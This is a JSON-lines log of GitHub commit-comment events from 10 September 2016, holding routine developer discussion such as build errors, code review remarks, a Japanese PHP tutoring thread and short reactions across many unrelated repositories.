{"id":"4543741711","type":"CommitCommentEvent","actor":{"login":"houd1ni"},"repo":{"name":"dimitrinicolas/marmottajax"},"payload":{"comment":{"id":18973119,"position":null,"line":null,"path":null,"commit_id":"815351fc8c72d4f0d2d4e6f333662264a29a8396","created_at":"2016-09-10T09:04:37Z","updated_at":"2016-09-10T09:04:37Z","body":"Hi !\r\n\r\nIndeed, if it is another library, it has to be totally another repo.\r\nBut I want to keep the concept, but **_make it modular_**.\r\n\r\nIt could have none of two or even both, will see in progress:\r\n- I want to keep full compatibility with marmottajax (drop-in replacement for advance)\r\n- Codebase, algorithms has to be the same. If I invent smth. better, I'll make commit here."}},"created_at":"2016-09-10T09:04:37Z"}
{"id":"4543742180","type":"CommitCommentEvent","actor":{"login":"xfurry"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":18973120,"position":6,"line":40,"path":"src/scriptdev2/scripts/eastern_kingdoms/stratholme/instance_stratholme.cpp","commit_id":"a57f2e8db0357dcd12eee10e7bf1c16c4a904e6b","created_at":"2016-09-10T09:05:03Z","updated_at":"2016-09-10T09:05:03Z","body":"Build error:\r\n\r\n```\r\nError\t1\terror C2536: 'instance_stratholme::instance_stratholme::m_uiGateTrapTimers' : cannot specify explicit initializer for arrays\tC:\\...\\core_wotlk\\src\\scriptdev2\\scripts\\eastern_kingdoms\\stratholme\\instance_stratholme.cpp\t41\t1\tScriptDev2\r\n```"}},"created_at":"2016-09-10T09:05:03Z"}
{"id":"4543742911","type":"CommitCommentEvent","actor":{"login":"IAmNotHanni"},"repo":{"name":"inexor-game/code"},"payload":{"comment":{"id":18973121,"position":null,"line":null,"path":null,"commit_id":"0d436c787b8e02bd0c3d69c03e25ae854ee9926e","created_at":"2016-09-10T09:05:37Z","updated_at":"2016-09-10T09:05:37Z","body":"https://www.youtube.com/watch?list=PLCbZc-GgCGzLhkGS5l850tjCQrPUeapK6&v=4GuqvjhE_Gw"}},"created_at":"2016-09-10T09:05:37Z"}
{"id":"4543743316","type":"CommitCommentEvent","actor":{"login":"KristofferC"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973122,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T09:05:56Z","updated_at":"2016-09-10T09:05:56Z","body":"Interesting subarray improvements."}},"created_at":"2016-09-10T09:05:56Z"}
{"id":"4543744978","type":"CommitCommentEvent","actor":{"login":"liyuanwen1993"},"repo":{"name":"attackonFourier/weex_demo"},"payload":{"comment":{"id":18973125,"position":null,"line":null,"path":null,"commit_id":"b9f929b92afd2d475adb5c2799c6eb5aaeac2614","created_at":"2016-09-10T09:07:24Z","updated_at":"2016-09-10T09:07:24Z","body":"省市区选择"}},"created_at":"2016-09-10T09:07:24Z"}
{"id":"4543752013","type":"CommitCommentEvent","actor":{"login":"Bananeweizen"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":18973131,"position":5,"line":6,"path":"main/res/values/changelog_master.xml","commit_id":"af4d4fbdd1ea550697362642e3132227a25e7b9e","created_at":"2016-09-10T09:13:13Z","updated_at":"2016-09-10T09:13:13Z","body":"You know there is that edit button right next to each file in the github browser?"}},"created_at":"2016-09-10T09:13:13Z"}
{"id":"4543753793","type":"CommitCommentEvent","actor":{"login":"PtxDK"},"repo":{"name":"datalogisk-kantineforening/cokepc"},"payload":{"comment":{"id":18973133,"position":null,"line":null,"path":null,"commit_id":"9e65b9d7200681164feb26ae87791fa7b4a97b3d","created_at":"2016-09-10T09:14:49Z","updated_at":"2016-09-10T09:14:49Z","body":"Det vil jeg SE frem til. "}},"created_at":"2016-09-10T09:14:49Z"}
{"id":"4543756908","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18973137,"position":null,"line":null,"path":null,"commit_id":"4414b864cf69edc7e142c96fdca53bfa898de539","created_at":"2016-09-10T09:17:23Z","updated_at":"2016-09-10T09:17:23Z","body":"Including `cryptest.vcxproj.user` is by design. It adds a debugging command line argument. It means you can open `cryptest.sln`, press ***`F5`***, and the library builds and runs the validation suite. Users don't have to do anything special.\r\n\r\n```\r\n$ cat cryptest.vcxproj.user \r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<Project ToolsVersion=\"4.0\" xmlns=\"http://schemas.microsoft.com/developer/msbuild/2003\">\r\n  <PropertyGroup>\r\n    <LocalDebuggerCommandArguments>v</LocalDebuggerCommandArguments>\r\n  </PropertyGroup>\r\n</Project>\r\n```\r\n\r\n-----\r\n\r\n```\r\n$ git pull\r\n...\r\ncreate mode 100644 bds10.zip\r\n delete mode 100644 cryptdll.vcproj\r\n create mode 100644 cryptdll.vcxproj\r\n create mode 100644 cryptdll.vcxproj.filters\r\n delete mode 100644 cryptest.vcproj\r\n create mode 100644 cryptest.vcxproj\r\n create mode 100644 cryptest.vcxproj.filters\r\n create mode 100644 cryptest.vcxproj.user\r\n delete mode 100644 cryptest_bds.bdsgroup\r\n delete mode 100644 cryptest_bds.bdsproj\r\n delete mode 100644 cryptest_bds.bpf\r\n delete mode 100644 cryptlib.vcproj\r\n create mode 100644 cryptlib.vcxproj\r\n create mode 100644 cryptlib.vcxproj.filters\r\n delete mode 100644 cryptlib_bds.bdsproj\r\n delete mode 100644 cryptlib_bds.cpp\r\n delete mode 100644 dlltest.vcproj\r\n create mode 100644 dlltest.vcxproj\r\n create mode 100644 vs2005.zip\r\n delete mode 100644 vs2010.zip\r\n```"}},"created_at":"2016-09-10T09:17:23Z"}
{"id":"4543759332","type":"CommitCommentEvent","actor":{"login":"shoheis"},"repo":{"name":"hdfukuoka1985/phptrainning"},"payload":{"comment":{"id":18973140,"position":null,"line":null,"path":null,"commit_id":"c660213b9935079bf9ac89d9705a76527e5770b7","created_at":"2016-09-10T09:19:25Z","updated_at":"2016-09-10T09:19:25Z","body":"> 上記、ご説明ありがとうございます！\r\nご指示頂いたように修正した所、下記のようなエラーになりました。\r\nこれで正常に動いているということですね！\r\n\r\nおお、よかったです！これで正常にエラーがでています！\r\n\r\n> いずれにしても、 throw new Exceptionについては実際に動かす段になったら削除しておく必要があるということですね。\r\n\r\nそうですね。実際にはある条件になったら(if文などを使って)throw new Exception というように投げることが多いです。\r\n\r\nちなみに下記のデータベースへの接続部分\r\n```\r\nnew PDO('mysql:host=localhost;dbname=bbs;charset=utf8','root','root',\r\n\r\n    // プリペアドステートメントのエミュレーションを無効にして、\r\n    // MySQL ネイティブの静的プレースホルダを使用する\r\n     array(PDO::ATTR_EMULATE_PREPARES => false));\r\n```\r\n\r\nは接続に失敗すると`PDOException`を投げます(PDOを作った人がそう決めた)。\r\nですので`catch (PDOException $e)`と書いてあるわけです。"}},"created_at":"2016-09-10T09:19:25Z"}
{"id":"4543761580","type":"CommitCommentEvent","actor":{"login":"LukasJenicek"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18973141,"position":32,"line":0,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-10T09:21:19Z","updated_at":"2016-09-10T09:21:19Z","body":"The variable key is column index in xlsx file. I named the variable wrong. It is used in class CellWidthWriter. "}},"created_at":"2016-09-10T09:21:19Z"}
{"id":"4543764333","type":"CommitCommentEvent","actor":{"login":"LukasJenicek"},"repo":{"name":"LukasJenicek/spout"},"payload":{"comment":{"id":18973143,"position":57,"line":0,"path":"src/Spout/Writer/XLSX/Internal/Worksheet.php","commit_id":"ce3aa50dd9281ce1dc8a26b07bf1d5bb139a54cf","created_at":"2016-09-10T09:23:35Z","updated_at":"2016-09-10T09:23:35Z","body":"I am not sure about it on my local nachine this code works but lot of people told me that it must be before <sheetdata> tag. "}},"created_at":"2016-09-10T09:23:35Z"}
{"id":"4543764816","type":"CommitCommentEvent","actor":{"login":"mike-bekele"},"repo":{"name":"mike-bekele/Hello-World"},"payload":{"comment":{"id":18973145,"position":null,"line":null,"path":null,"commit_id":"308ba1c8726c5d7300ed998f06f324163c783dce","created_at":"2016-09-10T09:23:58Z","updated_at":"2016-09-10T09:23:58Z","body":"what is this about? "}},"created_at":"2016-09-10T09:23:58Z"}
{"id":"4543765784","type":"CommitCommentEvent","actor":{"login":"cicku"},"repo":{"name":"gfwlist/gfwlist"},"payload":{"comment":{"id":18973147,"position":null,"line":null,"path":null,"commit_id":"1a31063f0e3e9e007a4ad0ed7712a3d285789fc6","created_at":"2016-09-10T09:24:42Z","updated_at":"2016-09-10T09:24:42Z","body":"#346"}},"created_at":"2016-09-10T09:24:42Z"}
{"id":"4543766308","type":"CommitCommentEvent","actor":{"login":"akzot"},"repo":{"name":"akzot/testrep"},"payload":{"comment":{"id":18973149,"position":null,"line":null,"path":null,"commit_id":"1d7f2b2486b5baa888923c90569ed3db563c677c","created_at":"2016-09-10T09:25:06Z","updated_at":"2016-09-10T09:25:06Z","body":"фывфывфыв"}},"created_at":"2016-09-10T09:25:06Z"}
{"id":"4543766522","type":"CommitCommentEvent","actor":{"login":"TheDiamondYT1"},"repo":{"name":"minecrafter/voxelwind"},"payload":{"comment":{"id":18973150,"position":5,"line":9,"path":"server/src/main/resources/log4j2.xml","commit_id":"7fc7ba20cb6aa2d1e653d6f6ab4471d6cd2ef28e","created_at":"2016-09-10T09:25:14Z","updated_at":"2016-09-10T09:25:14Z","body":"YES FINALLY :+1: "}},"created_at":"2016-09-10T09:25:14Z"}
{"id":"4543766580","type":"CommitCommentEvent","actor":{"login":"akzot"},"repo":{"name":"akzot/testrep"},"payload":{"comment":{"id":18973151,"position":null,"line":null,"path":null,"commit_id":"1d7f2b2486b5baa888923c90569ed3db563c677c","created_at":"2016-09-10T09:25:16Z","updated_at":"2016-09-10T09:25:16Z","body":"осмысленный коммент"}},"created_at":"2016-09-10T09:25:16Z"}
{"id":"4543768266","type":"CommitCommentEvent","actor":{"login":"schmittjoh"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18973153,"position":null,"line":null,"path":null,"commit_id":"774d4fc41d16b013e2e851596c4c697a663d4952","created_at":"2016-09-10T09:26:43Z","updated_at":"2016-09-10T09:26:43Z","body":"Did you check the performance impact of this? This seems to affect everyone even those who do not make use of the feature."}},"created_at":"2016-09-10T09:26:43Z"}
{"id":"4543773232","type":"CommitCommentEvent","actor":{"login":"schmittjoh"},"repo":{"name":"schmittjoh/serializer"},"payload":{"comment":{"id":18973157,"position":31,"line":196,"path":"src/JMS/Serializer/GenericSerializationVisitor.php","commit_id":"447c7d38cd3ac6542c6eaec2818c608f4d9f6e89","created_at":"2016-09-10T09:30:52Z","updated_at":"2016-09-10T09:30:52Z","body":"This sounds as if it would require the data to actually exist, but it since it does not throw an exception, a better name is probably just ``setData`` and also to deprecate the ``addData`` method.\r\n\r\nThe limitation in addData was only useful as long as it was enforced to allow streaming output (which I never implemented), but as soon as there is a method that can overwrite data, we can just make that the default."}},"created_at":"2016-09-10T09:30:52Z"}
{"id":"4543774629","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18973159,"position":null,"line":null,"path":null,"commit_id":"11c622443d7563d1dcd1c867263093809b94fa2a","created_at":"2016-09-10T09:31:59Z","updated_at":"2016-09-10T09:31:59Z","body":"develop (mjwitte) - i386-Windows-7-VisualStudio-12: OK (1762 of 1762 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-11c622443d7563d1dcd1c867263093809b94fa2a-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-10T09:31:59Z"}
{"id":"4543776632","type":"CommitCommentEvent","actor":{"login":"clburlison"},"repo":{"name":"clburlison/imagr"},"payload":{"comment":{"id":18973160,"position":null,"line":null,"path":null,"commit_id":"05583c1a8e2cf7b01713971fd8138736c2d31cac","created_at":"2016-09-10T09:33:52Z","updated_at":"2016-09-10T09:33:52Z","body":"This bandaid might not be very good. On second glance it looks like I'm using the `self.targetVolume.mountpoint` which might not be updated to the new path. IE - you selected `/Volumes/boot HD` but during image it got changed to `/Volumes/Macintosh HD`. I didn't test that...and it likely fails."}},"created_at":"2016-09-10T09:33:52Z"}
{"id":"4543776726","type":"CommitCommentEvent","actor":{"login":"alexlhxie"},"repo":{"name":"alexlhxie/hello-world"},"payload":{"comment":{"id":18973161,"position":null,"line":null,"path":null,"commit_id":"a6125767a1406bb81eb1729893c03222f8d4ff39","created_at":"2016-09-10T09:33:58Z","updated_at":"2016-09-10T09:33:58Z","body":"alex comments on commit"}},"created_at":"2016-09-10T09:33:58Z"}
{"id":"4543777045","type":"CommitCommentEvent","actor":{"login":"tnrwil"},"repo":{"name":"WomenInLinux/CTFACADEMYTPA"},"payload":{"comment":{"id":18973162,"position":null,"line":null,"path":null,"commit_id":"995d6ad21abcf4124c19bd2194868e32a41c5252","created_at":"2016-09-10T09:34:14Z","updated_at":"2016-09-10T09:34:14Z","body":"deleting this file"}},"created_at":"2016-09-10T09:34:14Z"}
{"id":"4543777866","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973163,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:34:56Z","updated_at":"2016-09-10T09:34:56Z","body":"You (inadvertently?) removed geolocation from the pushbullet text in this commit and it never came back?"}},"created_at":"2016-09-10T09:34:56Z"}
{"id":"4543778775","type":"CommitCommentEvent","actor":{"login":"cubehouse"},"repo":{"name":"tericky/wdwJS"},"payload":{"comment":{"id":18973166,"position":null,"line":null,"path":null,"commit_id":"26d0f513bb9e2804c180daf03ef57593567c64f0","created_at":"2016-09-10T09:35:44Z","updated_at":"2016-09-10T09:35:44Z","body":"Out of curiosity, what does this fix mean? And would you be interested in merging it into the main wdwJS repo?\r\n\r\nThanks :)"}},"created_at":"2016-09-10T09:35:44Z"}
{"id":"4543779929","type":"CommitCommentEvent","actor":{"login":"zhangzhenonline"},"repo":{"name":"zhangzhenonline/zhufeng_homework7"},"payload":{"comment":{"id":18973168,"position":null,"line":null,"path":null,"commit_id":"b7c179befb127b9b16fc9740118b3020f53571f7","created_at":"2016-09-10T09:36:41Z","updated_at":"2016-09-10T09:36:41Z","body":"好"}},"created_at":"2016-09-10T09:36:41Z"}
{"id":"4543782225","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973171,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:38:41Z","updated_at":"2016-09-10T09:38:41Z","body":"It was intentional, since it didn't seem to be that useful to me and not giving a location most of the time either. But I'll put it back as an option."}},"created_at":"2016-09-10T09:38:41Z"}
{"id":"4543784695","type":"CommitCommentEvent","actor":{"login":"kevin1117"},"repo":{"name":"knightliao/disconf"},"payload":{"comment":{"id":18973172,"position":null,"line":null,"path":null,"commit_id":"94f511e4a33895f21dd10ce10dfccfeed21b84dc","created_at":"2016-09-10T09:40:47Z","updated_at":"2016-09-10T09:40:47Z","body":"廖总辛苦了，要上来就看到你可爱的头像了"}},"created_at":"2016-09-10T09:40:47Z"}
{"id":"4543785241","type":"CommitCommentEvent","actor":{"login":"weppos"},"repo":{"name":"dnsimple/dnsimple-developer"},"payload":{"comment":{"id":18973173,"position":null,"line":null,"path":null,"commit_id":"f86c3dea78f6998fa925466937f8d8f6d73c6e0a","created_at":"2016-09-10T09:41:11Z","updated_at":"2016-09-10T09:41:11Z","body":"👍 "}},"created_at":"2016-09-10T09:41:11Z"}
{"id":"4543786065","type":"CommitCommentEvent","actor":{"login":"SammysHP"},"repo":{"name":"cgeo/cgeo"},"payload":{"comment":{"id":18973175,"position":5,"line":6,"path":"main/res/values/changelog_master.xml","commit_id":"af4d4fbdd1ea550697362642e3132227a25e7b9e","created_at":"2016-09-10T09:41:55Z","updated_at":"2016-09-10T09:41:55Z","body":"I don't want to do such things on my phone."}},"created_at":"2016-09-10T09:41:55Z"}
{"id":"4543786296","type":"CommitCommentEvent","actor":{"login":"peterwang1996"},"repo":{"name":"xmjmsc/study1"},"payload":{"comment":{"id":18973177,"position":null,"line":null,"path":null,"commit_id":"09529e24b6d3775b6fa4ff1036af39371d3bc63d","created_at":"2016-09-10T09:42:09Z","updated_at":"2016-09-10T09:42:09Z","body":"告诉你的文件目录模式呢？回去再好好看看我的instruction"}},"created_at":"2016-09-10T09:42:09Z"}
{"id":"4543786451","type":"CommitCommentEvent","actor":{"login":"felipecustodio"},"repo":{"name":"dnery/plush"},"payload":{"comment":{"id":18973178,"position":null,"line":null,"path":null,"commit_id":"9f8841cb7ebd2b5b79a1a55296399e0a3d78f6ae","created_at":"2016-09-10T09:42:15Z","updated_at":"2016-09-10T09:42:15Z","body":"You have the best commits ever"}},"created_at":"2016-09-10T09:42:15Z"}
{"id":"4543788152","type":"CommitCommentEvent","actor":{"login":"mclarekin"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":18973181,"position":null,"line":null,"path":null,"commit_id":"090176fb96a3bf43b0c6963ccd1ebf6353d8ab79","created_at":"2016-09-10T09:43:42Z","updated_at":"2016-09-10T09:43:42Z","body":"I have little mandelbulbs, is that what this is about?\n\nOn Sat, Sep 10, 2016 at 7:23 PM, Krzysztof Marczak <notifications@github.com\n> wrote:\n\n> Should I already see any icon in the try? Actually there is nothing there.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/buddhi1980/mandelbulber2/commit/090176fb96a3bf43b0c6963ccd1ebf6353d8ab79#commitcomment-18972911>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AMLZHItDv_8V6wsCLDLmIHhL5owLW68Kks5qolrhgaJpZM4J5qIw>\n> .\n>\n"}},"created_at":"2016-09-10T09:43:42Z"}
{"id":"4543788858","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18973182,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T09:44:20Z","updated_at":"2016-09-10T09:44:20Z","body":"@abc612008 UDP网络的效率怎么想都不会比TCP低吧"}},"created_at":"2016-09-10T09:44:20Z"}
{"id":"4543789415","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18973183,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T09:44:48Z","updated_at":"2016-09-10T09:44:48Z","body":"况且把ioService绑定到Server上本来就是非常不clean的做法"}},"created_at":"2016-09-10T09:44:48Z"}
{"id":"4543790821","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":18973184,"position":22,"line":14,"path":"src/ng2/uiRouterConfig.ts","commit_id":"a68e367bd8d30ceb030106f767c891fcbf5948ff","created_at":"2016-09-10T09:45:57Z","updated_at":"2016-09-10T09:45:57Z","body":"`provideUIRouter({ configClass: MyUIRouterConfig**}**)` lacks one brace"}},"created_at":"2016-09-10T09:45:57Z"}
{"id":"4543791513","type":"CommitCommentEvent","actor":{"login":"pyllyukko"},"repo":{"name":"pyllyukko/harden.sh"},"payload":{"comment":{"id":18973185,"position":null,"line":null,"path":null,"commit_id":"ba9fc59941d2d37c2b01d4fd772c8fe1328a52cd","created_at":"2016-09-10T09:46:32Z","updated_at":"2016-09-10T09:46:32Z","body":"Hmm. Something wrong here:\r\n\r\n```\r\n# aa-enforce /etc/apparmor.d/*\r\nProfile for /etc/apparmor.d/abstractions not found, skipping\r\nTraceback (most recent call last):\r\n  File \"/usr/sbin/aa-enforce\", line 30, in <module>\r\n    tool.cmd_enforce()\r\n  File \"/usr/lib/python3/dist-packages/apparmor/tools.py\", line 153, in cmd_enforce\r\n    apparmor.read_profiles()\r\n  File \"/usr/lib/python3/dist-packages/apparmor/aa.py\", line 2572, in read_profiles\r\n    read_profile(profile_dir + '/' + file, True)\r\n  File \"/usr/lib/python3/dist-packages/apparmor/aa.py\", line 2598, in read_profile\r\n    profile_data = parse_profile_data(data, file, 0)\r\n  File \"/usr/lib/python3/dist-packages/apparmor/aa.py\", line 2853, in parse_profile_data\r\n    store_list_var(filelist[file]['lvar'], list_var, value, var_operation, file)\r\n  File \"/usr/lib/python3/dist-packages/apparmor/aa.py\", line 3289, in store_list_var\r\n    raise AppArmorException(_('Redefining existing variable %(variable)s: %(value)s in %(file)s') % { 'variable': list_var, 'value': value, 'file': filename })\r\napparmor.common.AppArmorException: 'Redefining existing variable @{TFTP_DIR}: /var/tftp /srv/tftpboot in /etc/apparmor.d/usr.sbin.dnsmasq'\r\n```"}},"created_at":"2016-09-10T09:46:32Z"}
{"id":"4543793388","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973186,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:48:08Z","updated_at":"2016-09-10T09:48:08Z","body":"Okay it's added back as the \"add_location_name\" setting."}},"created_at":"2016-09-10T09:48:08Z"}
{"id":"4543795981","type":"CommitCommentEvent","actor":{"login":"TinkerGnome"},"repo":{"name":"Ultimaker/Ultimaker2Marlin"},"payload":{"comment":{"id":18973187,"position":23,"line":278,"path":"Marlin/UltiLCD2_menu_material.cpp","commit_id":"33dcb23ac5b2b925bc490519b901dcc0d383a078","created_at":"2016-09-10T09:50:08Z","updated_at":"2016-09-10T09:50:08Z","body":"this fixes the \"heating/cooling\" endless loop"}},"created_at":"2016-09-10T09:50:08Z"}
{"id":"4543799303","type":"CommitCommentEvent","actor":{"login":"abc612008"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18973190,"position":18,"line":52,"path":"src/server/server.h","commit_id":"8de0766bfcbcab5862b4d32bdf245275169bc0aa","created_at":"2016-09-10T09:53:06Z","updated_at":"2016-09-10T09:53:06Z","body":"@Miigon 你不考虑UDP还要自己处理掉包吗？TCP比较慢的很大一部分原因是TCP有ACK包，要考虑顺序，丢包等情况，自己用UDP然后再处理这些情况不一定比TCP快。另外某些情况下TCP还真不一定比UDP慢。"}},"created_at":"2016-09-10T09:53:06Z"}
{"id":"4543799656","type":"CommitCommentEvent","actor":{"login":"hybridLJ"},"repo":{"name":"Hisoka-1/frogjumper"},"payload":{"comment":{"id":18973191,"position":4,"line":36,"path":"package.json","commit_id":"75f5a3792fa240d2de7e43f9184c30362149f968","created_at":"2016-09-10T09:53:23Z","updated_at":"2016-09-10T09:53:23Z","body":"You wrote \"bower in the house\" and I think you meant \"browser\". If it's your bachelor/master, you'd need to get rid of all your typos. Also they don't like seeing jokes. It needs to be clear and efficiently/effectively documented."}},"created_at":"2016-09-10T09:53:23Z"}
{"id":"4543800083","type":"CommitCommentEvent","actor":{"login":"TinkerGnome"},"repo":{"name":"Ultimaker/Ultimaker2Marlin"},"payload":{"comment":{"id":18973192,"position":27,"line":282,"path":"Marlin/UltiLCD2_menu_material.cpp","commit_id":"33dcb23ac5b2b925bc490519b901dcc0d383a078","created_at":"2016-09-10T09:53:48Z","updated_at":"2016-09-10T09:53:48Z","body":"Changing this factor is a bad idea, if this function is used during a paused print...\r\n...and unnecessary at all, because the volume_to_filament_length is taken into account for all material moves of the change material wizard. "}},"created_at":"2016-09-10T09:53:48Z"}
{"id":"4543800762","type":"CommitCommentEvent","actor":{"login":"arrowrowe"},"repo":{"name":"tongquhq/about"},"payload":{"comment":{"id":18973195,"position":null,"line":null,"path":null,"commit_id":"c171872beb7627a93d3893125598920344cdd357","created_at":"2016-09-10T09:54:25Z","updated_at":"2016-09-10T09:54:25Z","body":"wow"}},"created_at":"2016-09-10T09:54:25Z"}
{"id":"4543800896","type":"CommitCommentEvent","actor":{"login":"seikur0"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973196,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:54:34Z","updated_at":"2016-09-10T09:54:34Z","body":"I'm just wondering how much of that address is actually useful information, for me most of it seemed to be like \"You're in Germany. Wait, you don't say?\" and then somewhere between this is the name of a street I probably don't know :D"}},"created_at":"2016-09-10T09:54:34Z"}
{"id":"4543801513","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":18973198,"position":null,"line":null,"path":null,"commit_id":"c34ff5e132e1a75f4de1fa277cb523739a39c08c","created_at":"2016-09-10T09:55:06Z","updated_at":"2016-09-10T09:55:06Z","body":"@pb00068 Congrats for the promising results of the test, seems like it will pass :-)\r\n\r\nI think I need a lecture on the details of the SEE algorithm to better understand what you do... \r\nCould you explain us in words on an example the ideas and the implementation details? What is an absolute pin, as opposed to a normal pin? Especially lines 1003 and 1028 are tricky for me!"}},"created_at":"2016-09-10T09:55:06Z"}
{"id":"4543802277","type":"CommitCommentEvent","actor":{"login":"whatyouhide"},"repo":{"name":"elixir-addicts/rollbax"},"payload":{"comment":{"id":18973200,"position":null,"line":null,"path":null,"commit_id":"cd5c7cf8c287c3927f916a8df4444906fedc363b","created_at":"2016-09-10T09:55:41Z","updated_at":"2016-09-10T09:55:41Z","body":"\\cc @lexmag "}},"created_at":"2016-09-10T09:55:41Z"}
{"id":"4543802280","type":"CommitCommentEvent","actor":{"login":"lolilolicon"},"repo":{"name":"mvdan/fdroidcl"},"payload":{"comment":{"id":18973201,"position":null,"line":null,"path":null,"commit_id":"02aa950697877e81344cf773345699f2416d61b6","created_at":"2016-09-10T09:55:41Z","updated_at":"2016-09-10T09:55:41Z","body":"Was cpu.out added by mistake?"}},"created_at":"2016-09-10T09:55:41Z"}
{"id":"4543802282","type":"CommitCommentEvent","actor":{"login":"esmith5000"},"repo":{"name":"esmith5000/Hello-World"},"payload":{"comment":{"id":18973202,"position":4,"line":4,"path":"README.md","commit_id":"770b38b3a0ca06378a869a7b909b864a4f08ef23","created_at":"2016-09-10T09:55:41Z","updated_at":"2016-09-10T09:55:41Z","body":"I'm testing the editor by typing in directly"}},"created_at":"2016-09-10T09:55:41Z"}
{"id":"4543802559","type":"CommitCommentEvent","actor":{"login":"yuyichao"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18973204,"position":null,"line":null,"path":null,"commit_id":"843e0fea2549add6a7d1d6c752c5906691d601d6","created_at":"2016-09-10T09:55:57Z","updated_at":"2016-09-10T09:55:57Z","body":"Not really https://github.com/JuliaCI/BaseBenchmarks.jl/pull/23"}},"created_at":"2016-09-10T09:55:57Z"}
{"id":"4543802736","type":"CommitCommentEvent","actor":{"login":"jagaNikuman"},"repo":{"name":"LINQ-Robocup/LINQ"},"payload":{"comment":{"id":18973205,"position":34,"line":31,"path":"src/com/linq/Main.java","commit_id":"eb4efd652863f770bd4f379f50fbcb3cd66c4134","created_at":"2016-09-10T09:56:07Z","updated_at":"2016-09-10T09:56:07Z","body":"ここでRS485を読んでる"}},"created_at":"2016-09-10T09:56:07Z"}
{"id":"4543802929","type":"CommitCommentEvent","actor":{"login":"mvdan"},"repo":{"name":"mvdan/fdroidcl"},"payload":{"comment":{"id":18973206,"position":null,"line":null,"path":null,"commit_id":"02aa950697877e81344cf773345699f2416d61b6","created_at":"2016-09-10T09:56:16Z","updated_at":"2016-09-10T09:56:16Z","body":"Shit."}},"created_at":"2016-09-10T09:56:16Z"}
{"id":"4543803082","type":"CommitCommentEvent","actor":{"login":"creesch"},"repo":{"name":"creesch/userscripts"},"payload":{"comment":{"id":18973207,"position":6,"line":16,"path":"irccloud.user.js","commit_id":"f0547c6a1449d62d7efd274dbcbc2ea30cfe6d21","created_at":"2016-09-10T09:56:25Z","updated_at":"2016-09-10T09:56:25Z","body":"Pretty isn't it? "}},"created_at":"2016-09-10T09:56:25Z"}
{"id":"4543804389","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973208,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:57:38Z","updated_at":"2016-09-10T09:57:38Z","body":"For us, it shows the suburb so it lets roughly figure out if it's feasible to make it there, depending on expected traffic for the time of day and where we live.\r\nAlso I run a worker around my workplace as well and my friends don't live near there at all."}},"created_at":"2016-09-10T09:57:38Z"}
{"id":"4543805575","type":"CommitCommentEvent","actor":{"login":"c00ni"},"repo":{"name":"seikur0/PGO-mapscan-opt"},"payload":{"comment":{"id":18973209,"position":null,"line":null,"path":null,"commit_id":"d3be5240e0795b12b447138d22639cb45251c3e2","created_at":"2016-09-10T09:58:40Z","updated_at":"2016-09-10T09:58:40Z","body":"Also rare spawns seem to happen on familiar street names now. I've never known my local area like I do now!"}},"created_at":"2016-09-10T09:58:40Z"}
